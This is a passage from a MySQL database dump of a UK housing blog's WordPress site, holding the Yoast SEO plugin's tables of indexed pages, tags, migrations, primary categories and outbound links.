10:56:10',1,NULL,NULL,NULL,NULL,0,NULL),(39,'https://housing-today.co.uk/blog/category/uncategorized/','56:51b16adc9dbb51fbcabb3b12a8f0c1a8',1,'term','category',NULL,NULL,NULL,NULL,'Uncategorized',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-24 13:01:34','2021-08-24 13:01:34',1,NULL,NULL,NULL,NULL,0,NULL),(40,'https://housing-today.co.uk/blog/creating-perfect-outside/','58:d07bdd0edc74f39933fbb140a38ae361',19,'post','post',1,0,NULL,NULL,'Creating The Perfect Outside','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2016/11/roofs.jpg',NULL,'20','featured-image',NULL,NULL,'https://housing-today.co.uk/wp-content/uploads/2016/11/roofs.jpg','20','featured-image','{\"width\":960,\"height\":540,\"url\":\"https://housing-today.co.uk/wp-content/uploads/2016/11/roofs.jpg\",\"path\":\"/home/housing-today.co.uk/public_html/wp-content/uploads/2016/11/roofs.jpg\",\"size\":\"full\",\"id\":20,\"alt\":\"\",\"pixels\":518400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2021-08-24 15:08:30','2021-08-24 15:08:30',1,NULL,NULL,NULL,NULL,0,NULL),(41,'https://housing-today.co.uk/blog/tag/removals/','46:1eee4c83234d44ab50435e36c3fb237b',13,'term','post_tag',NULL,NULL,NULL,NULL,'removals',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-24 19:20:16','2021-08-24 19:20:16',1,NULL,NULL,NULL,NULL,0,NULL),(42,'https://housing-today.co.uk/blog/tag/money/','43:e55672df058f430ca35f54c7398a3586',14,'term','post_tag',NULL,NULL,NULL,NULL,'money',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-26 15:03:54','2021-08-26 15:03:54',1,NULL,NULL,NULL,NULL,0,NULL),(43,'https://housing-today.co.uk/blog/tag/rubbish-clearance/','55:53e1a9461f5ca992f333f399d0114cc3',21,'term','post_tag',NULL,NULL,NULL,NULL,'rubbish clearance',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-27 06:07:11','2021-08-27 06:07:11',1,NULL,NULL,NULL,NULL,0,NULL),(44,'https://housing-today.co.uk/blog/tag/rubbish-removal/','53:8489000e1884d571be2cfb74773ee3f9',22,'term','post_tag',NULL,NULL,NULL,NULL,'rubbish removal',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-27 06:07:16','2021-08-27 06:07:16',1,NULL,NULL,NULL,NULL,0,NULL),(45,'https://housing-today.co.uk/blog/tag/waste-clearance/','53:7dbaf75b98a35a61a0e518b845c9cc63',23,'term','post_tag',NULL,NULL,NULL,NULL,'waste clearance',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-27 06:07:23','2021-08-27 06:07:23',1,NULL,NULL,NULL,NULL,0,NULL),(46,'https://housing-today.co.uk/blog/tag/waste-removal/','51:30b368c16f79ef76a4a085c771a35370',24,'term','post_tag',NULL,NULL,NULL,NULL,'waste removal',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-27 06:07:30','2021-08-27 06:07:30',1,NULL,NULL,NULL,NULL,0,NULL),(47,'https://housing-today.co.uk/blog/tag/maintenance/','49:97cb8536c4069a8fd2b026cca45d5a12',17,'term','post_tag',NULL,NULL,NULL,NULL,'maintenance',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-08-28 10:42:32','2021-08-28 10:42:32',1,NULL,NULL,NULL,NULL,0,NULL),(48,'https://housing-today.co.uk/property-insurance/','47:d540320e9e1e6094e18a4cc4cd5337eb',296,'post','page',1,0,NULL,NULL,'Property Insurance','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-09-16 10:48:00','2021-09-16 10:48:03',1,NULL,NULL,NULL,NULL,0,NULL);
/*!40000 ALTER TABLE `wp_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_indexable_hierarchy`
--
DROP TABLE IF EXISTS `wp_yoast_indexable_hierarchy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable_hierarchy` (
`indexable_id` int(11) unsigned NOT NULL,
`ancestor_id` int(11) unsigned NOT NULL,
`depth` int(11) unsigned DEFAULT NULL,
`blog_id` bigint(20) NOT NULL DEFAULT 1,
PRIMARY KEY (`indexable_id`,`ancestor_id`),
KEY `indexable_id` (`indexable_id`),
KEY `ancestor_id` (`ancestor_id`),
KEY `depth` (`depth`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_indexable_hierarchy`
--
LOCK TABLES `wp_yoast_indexable_hierarchy` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable_hierarchy` VALUES (2,0,0,1),(3,0,0,1),(4,0,0,1),(5,0,0,1),(6,0,0,1),(7,0,0,1),(8,0,0,1),(9,0,0,1),(10,0,0,1),(11,0,0,1),(12,0,0,1),(13,0,0,1),(14,0,0,1),(15,0,0,1),(16,0,0,1),(17,0,0,1),(18,0,0,1),(19,16,1,1),(20,16,1,1),(21,0,0,1),(22,0,0,1),(23,0,0,1),(24,0,0,1),(25,0,0,1),(26,0,0,1),(27,0,0,1),(28,0,0,1),(29,0,0,1),(30,0,0,1),(31,0,0,1),(32,16,1,1),(33,0,0,1),(34,0,0,1),(35,0,0,1),(36,0,0,1),(37,0,0,1),(38,0,0,1),(39,0,0,1),(40,0,0,1),(41,0,0,1),(42,0,0,1),(43,0,0,1),(44,0,0,1),(45,0,0,1),(46,0,0,1),(47,0,0,1),(48,0,0,1);
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_migrations`
--
DROP TABLE IF EXISTS `wp_yoast_migrations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_migrations` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`version` varchar(191) DEFAULT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `wp_yoast_migrations_version` (`version`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_migrations`
--
LOCK TABLES `wp_yoast_migrations` WRITE;
/*!40000 ALTER TABLE `wp_yoast_migrations` DISABLE KEYS */;
INSERT INTO `wp_yoast_migrations` VALUES (1,'20171228151840'),(2,'20171228151841'),(3,'20190529075038'),(4,'20191011111109'),(5,'20200408101900'),(6,'20200420073606'),(7,'20200428123747'),(8,'20200428194858'),(9,'20200429105310'),(10,'20200430075614'),(11,'20200430150130'),(12,'20200507054848'),(13,'20200513133401'),(14,'20200609154515'),(15,'20200616130143'),(16,'20200617122511'),(17,'20200702141921'),(18,'20200728095334'),(19,'20201202144329'),(20,'20201216124002'),(21,'20201216141134');
/*!40000 ALTER TABLE `wp_yoast_migrations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_primary_term`
--
DROP TABLE IF EXISTS `wp_yoast_primary_term`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_primary_term` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) DEFAULT NULL,
`term_id` bigint(20) DEFAULT NULL,
`taxonomy` varchar(32) NOT NULL,
`created_at` datetime DEFAULT NULL,
`updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`blog_id` bigint(20) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `post_taxonomy` (`post_id`,`taxonomy`),
KEY `post_term` (`post_id`,`term_id`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_primary_term`
--
LOCK TABLES `wp_yoast_primary_term` WRITE;
/*!40000 ALTER TABLE `wp_yoast_primary_term` DISABLE KEYS */;
INSERT INTO `wp_yoast_primary_term` VALUES (1,94,9,'category','2021-06-28 10:47:25','2021-06-28 10:47:25',1),(2,1,2,'category','2021-06-28 10:47:46','2021-06-28 10:47:46',1),(3,35,4,'category','2021-06-28 10:48:16','2021-06-28 10:48:16',1),(4,209,5,'category','2021-06-28 11:51:33','2021-06-28 11:51:33',1),(5,15,3,'category','2021-06-28 12:02:46','2021-06-28 12:02:46',1),(6,180,11,'category','2021-06-28 12:23:50','2021-06-28 12:23:50',1),(7,158,10,'category','2021-08-23 10:35:09','2021-08-23 10:35:09',1),(8,19,4,'category','2021-08-24 15:08:30','2021-08-24 15:08:30',1);
/*!40000 ALTER TABLE `wp_yoast_primary_term` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_yoast_seo_links`
--
DROP TABLE IF EXISTS `wp_yoast_seo_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_links` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`url` varchar(255) DEFAULT NULL,
`post_id` bigint(20) unsigned DEFAULT NULL,
`target_post_id` bigint(20) unsigned DEFAULT NULL,
`type` varchar(8) DEFAULT NULL,
`indexable_id` int(11) unsigned DEFAULT NULL,
`target_indexable_id` int(11) unsigned DEFAULT NULL,
`height` int(11) unsigned DEFAULT NULL,
`width` int(11) unsigned DEFAULT NULL,
`size` int(11) unsigned DEFAULT NULL,
`language` varchar(32) DEFAULT NULL,
`region` varchar(32) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `link_direction` (`post_id`,`type`),
KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_yoast_seo_links`
--
LOCK TABLES `wp_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `wp_yoast_seo_links` VALUES (22,'/',287,NULL,'internal',15,2,NULL,NULL,NULL,NULL,NULL),(23,'https://prohousekeepers.com/blog/essential-cleaning-to-dos-before-you-start-unpacking-your-new-home/',287,NULL,'external',15,NULL,NULL,NULL,NULL,NULL,NULL),(24,'http://rubbish.me.uk/services/rubbish-clearance',287,NULL,'external',15,NULL,NULL,NULL,NULL,NULL,NULL),(25,'https://hoa.org.uk/2019/04/10-ways-to-settle-into-your-new-neighbourhood/',287,NULL,'external',15,NULL,NULL,NULL,NULL,NULL,NULL),(26,'https://www.moving.com/tips/36-moving-hacks-faster-easier-less-stressful-move/',287,NULL,'external',15,NULL,NULL,NULL,NULL,NULL,NULL),(27,'https://makespace.com/blog/posts/moving-packing-tips/',287,NULL,'external',15,NULL,NULL,NULL,NULL,NULL,NULL),(28,'https://www.housebeautiful.com/uk/renovate/a1531/real-truth-about-moving-house/',287,NULL,'external',15,NULL,NULL,NULL,NULL,NULL,NULL);
/*!40000 ALTER TABLE `wp_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2023-02-01 0:08:00